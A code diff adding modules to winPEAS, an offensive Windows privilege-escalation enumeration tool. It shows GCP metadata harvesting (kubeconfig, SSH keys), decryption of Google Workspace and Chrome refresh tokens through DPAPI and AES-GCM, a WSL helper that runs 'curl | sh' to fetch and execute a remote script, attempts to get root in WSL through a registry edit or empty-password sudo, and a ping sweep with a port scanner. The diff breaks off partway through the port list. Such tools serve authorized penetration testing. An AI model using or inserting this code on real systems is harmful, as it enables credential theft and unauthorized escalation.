private List<EndpointData> GetUserMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("startup-script", "instance/attributes/startup-script", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInterfacesMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var networkEndpointUrlBase = "instance/network-interfaces";
var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
foreach (var iface in ifaces.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Network", $"{networkEndpointUrlBase}/{iface}network", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInstanceMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Description", "instance/description", false),
new Tuple<string, string, bool>("Hostname", "instance/hostname", false),
new Tuple<string, string, bool>("Instance ID", "instance/id", false),
new Tuple<string, string, bool>("Instance Image", "instance/image", false),
new Tuple<string, string, bool>("Machine Type", "instance/machine-type", false),
new Tuple<string, string, bool>("Instance Name", "instance/name", false),
new Tuple<string, string, bool>("Instance tags", "instance/scheduling/tags", false),
new Tuple<string, string, bool>("Zone", "instance/zone", false),
new Tuple<string, string, bool>("K8s Cluster Location", "instance/attributes/cluster-location", false),
new Tuple<string, string, bool>("K8s Cluster name", "instance/attributes/cluster-name", false),
new Tuple<string, string, bool>("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
new Tuple<string, string, bool>("K8s Kube-labels", "instance/attributes/kube-labels", false),
new Tuple<string, string, bool>("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
new Tuple<string, string, bool>("K8s Kube-env", "instance/attributes/kube-env", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetOSLoginMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("OSLogin users", "oslogin/users", false),
new Tuple<string, string, bool>("OSLogin Groups", "oslogin/groups", false),
new Tuple<string, string, bool>("OSLogin Security Keys", "oslogin/security-keys", false),
new Tuple<string, string, bool>("OSLogin Authorize", "oslogin/authorize", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetGCProjectMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Project-ID", "project/project-id", false),
new Tuple<string, string, bool>("Project Number", "project/numeric-project-id", false),
new Tuple<string, string, bool>("Project SSH-Keys", "project/attributes/ssh-keys", false),
new Tuple<string, string, bool>("All Project Attributes", "project/attributes/?recursive=true", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result?.Trim(),
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
}
}
}

328
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GWorkspaceInfo.cs Normal file
View File

@@ -0,0 +1,328 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using winPEAS.Helpers;
using System.Data.SQLite;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Parameters;
using Org.BouncyCastle.Crypto.Modes;
using System.Linq;
using Microsoft.Win32;
using System.Web.Script.Serialization;
namespace winPEAS.Info.CloudInfo
{
internal class GCPJoinedInfo : CloudInfoBase
{
public override string Name => "Google Workspace Joined";
public override bool IsCloud => CheckIfGCPWUsers();
private Dictionary<string, List<EndpointData>> _endpointData = null;
private List<EndpointData> GetWorkspaceRegValues()
{
Dictionary<string, string> workspaceRegValues = new Dictionary<string, string>();
workspaceRegValues.Add("Domains Allowed", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW", @"domains_allowed_to_login"));
// Get all values from all subregistries of Users
string[] users = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\GCPW\Users");
for (int i = 0; i < users.Length; i++)
{
workspaceRegValues.Add($"HKLM Workspace user{i}", users[i]);
workspaceRegValues.Add($" Email{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"email"));
workspaceRegValues.Add($" Domain{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"domain"));
workspaceRegValues.Add($" Id{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"id"));
workspaceRegValues.Add($" Pic{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"pic"));
workspaceRegValues.Add($" User Name{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"user_name"));
workspaceRegValues.Add($" Last Policy Refresh Time{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"last_policy_refresh_time"));
workspaceRegValues.Add($" Last Token Valid Millis{i}", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Google\GCPW\Users\" + users[i], @"last_token_valid_millis"));
}
string[] users3 = Helpers.Registry.RegistryHelper.GetRegSubkeys("HCKU", @"SOFTWARE\Google\Accounts");
if (users3.Length > 0)
{
workspaceRegValues.Add($"HKU Workspace user", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
}
for (int i = 0; i < users3.Length; i++)
{
workspaceRegValues.Add($" HKU-Email{i}", Helpers.Registry.RegistryHelper.GetRegValue("HCKU", @"SOFTWARE\Google\Accounts\"+ users3[i], @"email"));
string refreshTokenPath = @"HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\" + users3[i];
byte[] refreshTokenB = (byte[])Registry.GetValue(refreshTokenPath, @"refresh_token", null);
if (refreshTokenB.Length > 0)
{
string refreshTokenDecrypted = DecryptRegRefreshToken(refreshTokenPath);
if (refreshTokenDecrypted.Length > 0)
workspaceRegValues.Add($" HKU-Refresh Token{i}", refreshTokenDecrypted);
}
}
// Get cloud management tokens
workspaceRegValues.Add("Chrome Enrollment Token", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Policies\Google\Chrome", @"CloudManagementEnrollmentToken"));
workspaceRegValues.Add("Workspace Enrollment Token", Helpers.Registry.RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Policies\Google\CloudManagement", @"EnrollmentToken"));
// Format the info in expected CloudInfo format
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var kvp in workspaceRegValues)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = kvp.Key,
Data = kvp.Value?.Trim(),
IsAttackVector = false
});
}
return _endpointDataList;
}
static string DecryptRegRefreshToken(string registryPath)
{
// Define the registry path where the refresh token is stored
string valueName = "refresh_token";
// Retrieve the encrypted refresh token from the registry
byte[] encryptedRefreshToken = (byte[])Registry.GetValue(registryPath, valueName, null);
if (encryptedRefreshToken == null || encryptedRefreshToken.Length == 0)
{
Console.WriteLine("No encrypted refresh token found in the registry.");
return "";
}
try
{
// Decrypt the refresh token using CryptUnprotectData
byte[] decryptedTokenBytes = ProtectedData.Unprotect(
encryptedRefreshToken,
null, // No additional entropy
DataProtectionScope.CurrentUser // Use the current user's scope
);
// Convert the decrypted token to an ASCII string
string refreshToken = Encoding.ASCII.GetString(decryptedTokenBytes);
return refreshToken;
}
catch (Exception ex)
{
Console.WriteLine("Error decrypting the refresh token: " + ex.Message);
}
return "";
}
public static bool CheckIfGCPWUsers()
{
string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\GCPW\Users");
return check != null && check.Length > 0;
}
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("Local Info", GetWorkspaceRegValues());
_endpointData.Add("Local Refresh Tokens", GetRefreshToken());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
static List<EndpointData> GetRefreshToken()
{
string chromeLocalStatePath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
string masterKey = GetMasterKey(chromeLocalStatePath);
string[] chromeProfilePaths = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\", "Defaul*");
string[] chromeExtraProfilePaths = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\", "Profile*");
string[] chromeAllProfilePaths = chromeProfilePaths.Concat(chromeExtraProfilePaths).ToArray();
string[] refreshTokens = new string[0];
foreach (string profilePath in chromeAllProfilePaths)
{
string webDataPath = Path.Combine(profilePath, "Web Data");
if (File.Exists(webDataPath))
{
refreshTokens = ExtractRefreshTokens(webDataPath, masterKey);
}
}
List<EndpointData> _endpointDataList = new List<EndpointData>();
for (int i = 0; i < refreshTokens.Length; i++)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = $"Token{i}" ,
Data = refreshTokens[i].Trim(),
IsAttackVector = true
});
}
return _endpointDataList;
}
private static string GetMasterKey(string localStatePath)
{
string localStateJson = File.ReadAllText(localStatePath);
JavaScriptSerializer serializer = new JavaScriptSerializer();
dynamic json = serializer.Deserialize<dynamic>(localStateJson);
string encryptedKeyBase64 = json["os_crypt"]["encrypted_key"];
byte[] encryptedKeyWithPrefix = Convert.FromBase64String(encryptedKeyBase64);
byte[] encryptedKey = new byte[encryptedKeyWithPrefix.Length - 5];
Array.Copy(encryptedKeyWithPrefix, 5, encryptedKey, 0, encryptedKeyWithPrefix.Length - 5);
byte[] masterKey = ProtectedData.Unprotect(encryptedKey, null, DataProtectionScope.CurrentUser);
return Convert.ToBase64String(masterKey);
}
private static string[] ExtractRefreshTokens(string webDataPath, string masterKey)
{
List<string> refreshTokens = new List<string>();
try
{
using (SQLiteConnection connection = new SQLiteConnection($"Data Source={webDataPath};Version=3;"))
{
connection.Open();
string query = "SELECT service, encrypted_token FROM token_service;";
using (SQLiteCommand command = new SQLiteCommand(query, connection))
using (SQLiteDataReader reader = command.ExecuteReader())
{
while (reader.Read())
{
string service = reader["service"].ToString();
// Check if encrypted_token is null or empty
if (reader["encrypted_token"] == DBNull.Value)
{
Console.WriteLine("The encrypted_token is NULL in the database.");
continue;
}
byte[] encryptedToken = (byte[])reader["encrypted_token"];
string decryptedToken = DecryptWithAESGCM(encryptedToken, Convert.FromBase64String(masterKey));
refreshTokens.Add(decryptedToken);
}
}
}
return refreshTokens.ToArray();
}
catch (Exception ex)
{
Console.WriteLine("Error extracting refresh tokens (If Chrome is running the DB is probably locked): " + ex.Message);
return refreshTokens.ToArray();
}
}
public static string DecryptWithAESGCM(byte[] ciphertext, byte[] key)
{
// Constants
int nonceLength = 12; // GCM standard nonce length
int macLength = 16; // GCM authentication mac length
string versionPrefix = "v10"; // Matching kEncryptionVersionPrefix
// Convert prefix to byte array
byte[] versionPrefixBytes = Encoding.ASCII.GetBytes(versionPrefix);
// Check the prefix
if (ciphertext.Length < versionPrefixBytes.Length ||
!IsPrefixMatch(ciphertext, versionPrefixBytes))
{
throw new ArgumentException("Invalid encryption version prefix.");
}
// Extract the nonce from the ciphertext (after the prefix)
byte[] nonce = new byte[nonceLength];
Array.Copy(ciphertext, versionPrefixBytes.Length, nonce, 0, nonceLength);
// Extract the actual encrypted data (after the prefix and nonce)
int encryptedDataStartIndex = versionPrefixBytes.Length + nonceLength;
byte[] encryptedData = new byte[ciphertext.Length - encryptedDataStartIndex];
Array.Copy(ciphertext, encryptedDataStartIndex, encryptedData, 0, encryptedData.Length);
// Split the mac and actual ciphertext
byte[] mac = new byte[macLength];
Array.Copy(encryptedData, encryptedData.Length - macLength, mac, 0, macLength);
byte[] actualCiphertext = new byte[encryptedData.Length - macLength];
Array.Copy(encryptedData, 0, actualCiphertext, 0, actualCiphertext.Length);
// Perform the decryption using Bouncy Castle
try
{
GcmBlockCipher gcm = new GcmBlockCipher(new Org.BouncyCastle.Crypto.Engines.AesEngine());
AeadParameters parameters = new AeadParameters(new KeyParameter(key), macLength * 8, nonce);
gcm.Init(true, parameters);
byte[] plaintext = new byte[gcm.GetOutputSize(actualCiphertext.Length)];
int len = gcm.ProcessBytes(actualCiphertext, 0, actualCiphertext.Length, plaintext, 0);
string plaintextString = Encoding.ASCII.GetString(plaintext, 0, len);
gcm.DoFinal(plaintext, len);
return plaintextString;
}
catch (InvalidCipherTextException ex)
{
throw new CryptographicException("Decryption failed due to MAC mismatch", ex);
}
}
private static bool IsPrefixMatch(byte[] ciphertext, byte[] versionPrefixBytes)
{
for (int i = 0; i < versionPrefixBytes.Length; i++)
{
if (ciphertext[i] != versionPrefixBytes[i])
return false;
}
return true;
}
private static byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
{
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
{
cryptoStream.Write(data, 0, data.Length);
cryptoStream.FlushFinalBlock();
return ms.ToArray();
}
}
}
public override bool TestConnection()
{
return true;
}
}
}

136
winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs Normal file
View File

@@ -0,0 +1,136 @@
using System;
using System.Diagnostics;
using System.Text;
using winPEAS.Helpers.Registry;
namespace winPEAS.Info.FilesInfo.WSL
{
public class WSLHelper
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
var cmd = CreateUnixCommand(linpeasCmd);
ExecuteCommand(cmd.Item1, cmd.Item2);
}
internal static Tuple<string, string> CreateUnixCommand(string command, string distributionName = null)
{
string wsl = Environment.Is64BitProcess
? "wsl.exe"
: Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
string distributionParam = !string.IsNullOrEmpty(distributionName)
? $"--distribution {distributionName}"
: string.Empty;
string args = $"{distributionParam} -- {command}";
return new Tuple<string, string>(wsl, args);
}
static string GetWSLUser(string distributionName)
{
string command = "whoami";
var cmd = CreateUnixCommand(command, distributionName);
var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
return user;
}
internal static string TryGetRootUser(string distributionName, string distributionGuid)
{
string hive = "HKCU";
string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
string key = "DefaultUid";
string wslUser = GetWSLUser(distributionName);
string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
string root = $"root ({exploit})";
if (string.Equals(wslUser, "root"))
{
return "root";
}
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
wslUser = GetWSLUser(distributionName);
if (string.Equals(wslUser, "root"))
{
RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
return root;
}
}
// try sudo without password
exploit = "sudo with empty password";
var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
if (output == "root")
{
return $"root ({exploit})";
}
return wslUser;
}
private static string ExecuteCommandWaitForOutput(string cmd, string args)
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = cmd;
p.StartInfo.Arguments = args;
p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
p.Start();
string output = p.StandardOutput.ReadToEnd()?.Trim();
p.WaitForExit();
return output;
}
private static void ExecuteCommand(
string command,
string args = null,
string workingFolder = null
)
{
var processStartInfo = new ProcessStartInfo
{
UseShellExecute = false,
Verb = "OPEN",
CreateNoWindow = true,
FileName = command,
WorkingDirectory = workingFolder,
Arguments = args,
RedirectStandardOutput = true,
RedirectStandardError = true,
StandardOutputEncoding = Encoding.UTF8
};
using (var process = Process.Start(processStartInfo))
{
if (process != null)
{
while (!process.StandardOutput.EndOfStream)
{
Console.WriteLine(process.StandardOutput.ReadLine());
}
while (!process.StandardError.EndOfStream)
{
Console.WriteLine(process.StandardError.ReadLine());
}
}
}
}
}
}

56
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs Normal file
View File

@@ -0,0 +1,56 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetPinger
{
private int PingTimeout = 1000;
public List<string> HostsAlive = new List<string>();
private List<string> ipRange = new List<string>();
public void AddRange(string baseIpAddress, string netmask)
{
var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
ipRange.AddRange(range);
}
public void AddRange(IEnumerable<string> ipAddressList)
{
ipRange.AddRange(ipAddressList);
}
public async Task RunPingSweepAsync()
{
var tasks = new List<Task>();
foreach (var ip in ipRange)
{
Ping p = new Ping();
var task = PingAndUpdateStatus(p, ip);
tasks.Add(task);
}
await Task.WhenAll(tasks);
}
private async Task PingAndUpdateStatus(Ping ping, string ip)
{
var reply = await ping.SendPingAsync(ip, PingTimeout);
if (reply.Status == IPStatus.Success)
{
HostsAlive.Add(ip);
await Console.Out.WriteLineAsync(ip);
}
}
}
}

93
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs Normal file
View File

@@ -0,0 +1,93 @@
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using winPEAS.Helpers;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetworkScanner
{
enum ScanMode
{
Auto,
IPAddressList,
IPAddressNetmask,
}
private string[] ipAddressList;
private bool isAuto = false;
private ScanMode scanMode = ScanMode.IPAddressList;
private string baseAddress;
private string netmask;
IEnumerable<int> ports;
public NetworkScanner(string options, IEnumerable<int> ports = null)
{
/*
--network "auto" - find interfaces/hosts automatically
--network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
--network "10.10.10.10/24" - scan host based on ip address/netmask
*/
this.ports = ports;
if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
{
scanMode = ScanMode.Auto;
}
else if (options.Contains("/"))
{
var parts = options.Split('/');
baseAddress = parts[0];
netmask = parts[1];
scanMode = ScanMode.IPAddressNetmask;
}
else
{
ipAddressList = options.Split(',');
scanMode = ScanMode.IPAddressList;
}
}
public void Scan()
{
try
{
Beaprint.GreatPrint("Scanning network (it might take some time)...");
List<string> aliveHosts = new List<string>();
NetPinger netPinger = new NetPinger();
if (scanMode == ScanMode.Auto)
{
// this is the "auto" mode
foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
{
netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
}
}
if (scanMode == ScanMode.IPAddressNetmask)
{
netPinger.AddRange(baseAddress, netmask);
}
else if (scanMode == ScanMode.IPAddressList)
{
netPinger.AddRange(ipAddressList);
}
var task = netPinger.RunPingSweepAsync();
task.Wait();
aliveHosts.AddRange(netPinger.HostsAlive);
PortScanner ps = new PortScanner(this.ports);
Parallel.ForEach(aliveHosts, host =>
{
ps.Start(host);
});
}
catch (Exception e)
{
Beaprint.PrintException(e.Message);
}
}
}
}

221
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs Normal file
View File

@@ -0,0 +1,221 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal static class NetworkUtils
{
/// <summary>
/// IPAddress to UInteger
/// </summary>
/// <param name="ipAddress"></param>
/// <returns></returns>
public static uint IPToUInt(this string ipAddress)
{
if (string.IsNullOrEmpty(ipAddress))
return 0;
if (IPAddress.TryParse(ipAddress, out IPAddress ip))
{
var bytes = ip.GetAddressBytes();
Array.Reverse(bytes);
return BitConverter.ToUInt32(bytes, 0);
}
else
return 0;
}
/// <summary>
/// IP in Uinteger to string
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static string IPToString(this uint ipUInt)
{
return ToIPAddress(ipUInt).ToString();
}
/// <summary>
/// IP in Uinteger to IPAddress
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static IPAddress ToIPAddress(this uint ipUInt)
{
var bytes = BitConverter.GetBytes(ipUInt);
Array.Reverse(bytes);
return new IPAddress(bytes);
}
/// <summary>
/// First and Last IPv4 from IP + Mask
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
/// </remarks>
public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
{
uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
return Array.ConvertAll(uiIpRange, x => IPToString(x));
}
/// <summary>
/// First and Last IPv4 + Mask.
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// First IP is not usable and last is reserverd for broadcast.
/// Can use all IPs in between
/// </remarks>
public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
{
uint sub;
//check if mask is CIDR Notation
if (mask.Contains("."))
{
sub = IPToUInt(mask);
}
else
{
sub = ~(0xffffffff >> Convert.ToInt32(mask));
}
uint ip2 = IPToUInt(ipv4);
uint first = ip2 & sub;
uint last = first | (0xffffffff & ~sub);
if (filterUsable)
{
first += 1;
last -= 1;
}
return new uint[] { first, last };
}
public static IEnumerable<string> GetIPRange(IPAddress startIP, IPAddress endIP)
{
uint sIP = ipToUint(startIP.GetAddressBytes());
uint eIP = ipToUint(endIP.GetAddressBytes());
while (sIP <= eIP)
{
yield return new IPAddress(reverseBytesArray(sIP)).ToString();
sIP++;
}
}
public static string CidrToNetmask(int cidr)
{
var nmask = 0xFFFFFFFF;
nmask <<= 32 - cidr;
byte[] bytes = BitConverter.GetBytes(nmask);
Array.Reverse(bytes);
nmask = BitConverter.ToUInt32(bytes, 0);
var netmask = new System.Net.IPAddress(nmask);
return netmask.ToString();
}
public static IEnumerable<string> GetIPAddressesByNetmask(string ipAddress, string netmask)
{
// TODO
// e.g.
// netmask should be e.g. 24 - currently we only support this format
string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
return range;
}
public static IEnumerable<string> GetHostsByIPAndNetmask(string ipAddressAndNetmask)
{
// TODO
// get hosts by ip address & netmask
// https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
// we nned to (maybe in parallel)
// - ping e.g. 3 times
// - scan top 5 ports
var parts = ipAddressAndNetmask.Split(':');
return new List<string>
{
parts[0]
};
}
public static List<Tuple<string, string>> GetInternalInterfaces()
{
List<Tuple<string, string>> result = new List<Tuple<string, string>>();
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.OperationalStatus == OperationalStatus.Up &&
(ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
{
// Console.WriteLine();
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
// we need ip address and a netmask as well
result.Add(new Tuple<string, string>(ip.Address.ToString(), ip.IPv4Mask.ToString()));
}
}
}
}
return result;
}
/* Convert bytes array to 32 bit long value */
static uint ipToUint(byte[] ipBytes)
{
ByteConverter bConvert = new ByteConverter();
uint ipUint = 0;
int shift = 24; // indicates number of bits left for shifting
foreach (byte b in ipBytes)
{
if (ipUint == 0)
{
ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
shift -= 8;
continue;
}
if (shift >= 8)
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
else
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
shift -= 8;
}
return ipUint;
}
/* reverse byte order in array */
private static uint reverseBytesArray(uint ip)
{
byte[] bytes = BitConverter.GetBytes(ip);
bytes = bytes.Reverse().ToArray();
return (uint)BitConverter.ToInt32(bytes, 0);
}
}
}

122
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs Normal file
View File

@@ -0,0 +1,122 @@
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
class PortScanner
{
private int TcpTimeout = 500; // ms
#region nmap tcp top 1000
static List<int> nmapTop1000TCPPorts = new List<int>
{
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
